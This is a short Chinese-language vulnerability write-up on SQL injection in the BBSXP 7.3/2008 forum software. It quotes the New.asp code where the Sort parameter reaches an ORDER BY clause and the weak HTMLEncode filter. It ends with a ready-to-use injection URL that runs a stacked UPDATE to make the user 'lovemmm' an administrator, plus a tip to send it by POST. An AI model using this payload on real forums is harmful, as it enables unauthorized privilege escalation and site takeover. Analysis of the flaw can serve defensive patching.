受影响系统：
BBSXP7.3
BBSXP2008漏洞文件：
New.asp代码分析：Sort=HTMLEncode(Request("Sort")) //第24行if Sort = empty then
SqlSort="ThreadID"
else
SqlSort=Sort
end if
。。。。。。
sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" //第66行过滤函数HTMLEncode 在文件BBSXP_Class.asp中：
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42)&CHR(42),"**") '“**”
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"&#60;") '“<”
fString=Replace(fString,CHR(62),"&#62;") '“>”
fString=Replace(fString,CHR(92),"&#92;") '“\”
fString=Replace(fString,CHR(59),"&#59;") '“;”
fString=Replace(fString,CHR(10),"<br>")
fString=ReplaceText(fString,"([&#])([a-z0-9]*)&#59;","$1$2;")if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")
fString=unescape(fString)
end ifHTMLEncode=fString
End Function
HTMLEncode过滤了Tab键，空格，** .
变量SqlSort过滤不严导致sql注入漏洞的产生。漏洞测试：
http://localhost/bbsxp/new.asp?Sort=ThreadIDupdatebbsxp_userssetUserRoleID=1whereUsername=0x6C006F00760065006D006D006D00select*fromBBSXP_usersorderbyuserid
成功修改用户名为lovemmm为管理员。(最好使用POST提交呵呵)